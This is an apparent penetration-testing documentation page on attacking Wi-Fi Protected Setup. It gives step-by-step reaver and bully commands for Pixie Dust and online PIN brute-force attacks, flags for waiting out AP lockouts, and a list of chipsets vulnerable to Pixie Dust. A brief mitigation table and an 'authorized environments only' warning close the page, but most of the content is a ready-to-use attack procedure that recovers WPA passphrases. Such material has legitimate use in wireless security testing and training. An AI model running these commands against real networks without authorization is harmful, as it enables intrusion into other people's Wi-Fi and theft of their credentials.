> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# WPS

> WPS PIN brute force and Pixie Dust attacks using wash, reaver, and bully.

## Overview

WPS (Wi-Fi Protected Setup) PIN is an 8-digit code split into two 4-digit halves, verified independently. This design flaw reduces the keyspace from 10⁸ to \~11,000 combinations, making brute force feasible.

**Pixie Dust** exploits weak nonce generation in some chipsets to recover the PIN offline in seconds.

***

## Tools

| Tool     | Purpose                                      |
| -------- | -------------------------------------------- |
| `wash`   | Enumerate WPS-enabled APs                    |
| `reaver` | WPS PIN brute force + Pixie Dust             |
| `bully`  | Alternative WPS PIN brute force + Pixie Dust |

***

## 1. Enable Monitor Mode

```bash theme={"dark"}
sudo airmon-ng check kill
sudo airmon-ng start wlan0
```

***

## 2. Enumerate WPS-Enabled Networks

```bash theme={"dark"}
sudo wash -i wlan0mon
```

Key output columns:

| Column | Meaning                       |
| ------ | ----------------------------- |
| BSSID  | AP MAC address                |
| Ch     | Channel                       |
| dBm    | Signal strength               |
| WPS    | WPS version                   |
| Lck    | Locked (Yes = lockout active) |
| ESSID  | Network name                  |

Target APs with `Lck: No`.

***

## 3. Pixie Dust Attack

Offline attack — recovers PIN from weak nonces. Fast (seconds on vulnerable chipsets).

**With reaver:**

```bash theme={"dark"}
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -K 1 -vv
```

**With bully:**

```bash theme={"dark"}
sudo bully wlan0mon -b <BSSID> -c <CHANNEL> -d -v 3
```

`-K 1` / `-d` = Pixie Dust mode.

If successful, outputs WPS PIN and WPA passphrase.

***

## 4. WPS PIN Brute Force

Online attack — tries all PIN combinations. Takes 4–10 hours on non-locked APs.

**With reaver:**

```bash theme={"dark"}
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv
```

**With bully:**

```bash theme={"dark"}
sudo bully wlan0mon -b <BSSID> -c <CHANNEL> -v 3
```

**Resume interrupted session (reaver):**

```bash theme={"dark"}
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv -S
```

Session state saved in `/etc/reaver/<BSSID>.wpc`.

***

## 5. Tune for Rate Limiting / Lockouts

```bash theme={"dark"}
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv \
  --delay=5 \
  --lock-delay=300 \
  --fail-wait=360
```

| Flag           | Effect                               |
| -------------- | ------------------------------------ |
| `--delay`      | Seconds between PIN attempts         |
| `--lock-delay` | Wait time after lockout detected     |
| `--fail-wait`  | Wait time after consecutive failures |

***

## 6. Known Vulnerable Chipsets (Pixie Dust)

Chipsets with weak nonce generation:

* Ralink (RT2860, RT3070, RT5370)
* Realtek (RTL8188)
* Broadcom (early firmware)
* Some Atheros implementations

Check with [PixieWPS compatibility list](https://github.com/wiire-a/pixiewps) if Pixie Dust fails.

***

## Mitigation Reference

| Defense               | Effect                                     |
| --------------------- | ------------------------------------------ |
| Disable WPS entirely  | Removes attack surface                     |
| Enable AP PIN lockout | Slows brute force, doesn't stop Pixie Dust |
| Updated firmware      | Patches weak nonce generation              |

***

<Note>
  Always run `wash` first. Attacking a locked AP (`Lck: Yes`) wastes time — wait for lockout to reset or target a different AP.
</Note>

<Warning>
  Authorized environments only. WPS attacks against networks you don't own or have explicit permission to test are illegal.
</Warning>
